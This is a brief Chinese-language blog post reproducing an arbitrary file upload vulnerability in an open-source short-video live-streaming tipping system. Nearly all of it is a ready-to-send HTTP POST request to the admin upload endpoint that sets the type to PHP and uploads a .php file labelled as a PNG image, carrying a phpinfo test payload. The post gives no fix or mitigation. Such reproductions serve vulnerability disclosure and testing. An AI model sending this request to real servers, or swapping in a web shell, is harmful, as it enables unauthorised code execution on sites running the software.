Babing
Published on 2024-08-30 / 0 Visits
0
0

K32-2开源-短视频直播打赏系统-任意文件上传

K32-2开源-短视频直播打赏系统-任意文件上传

漏洞复现:

payload:

POST /admin/ajax/upload HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqVHCE6rweLU4xoLd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Cookie: userid=1; PHPSESSID=0adefea6a8449db4f66e621b644e572d; path=/
Connection: close

------WebKitFormBoundaryqVHCE6rweLU4xoLd
Content-Disposition: form-data; name="type"

php
------WebKitFormBoundaryqVHCE6rweLU4xoLd
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: image/png

<?php phpinfo();?>
------WebKitFormBoundaryqVHCE6rweLU4xoLd--

Comment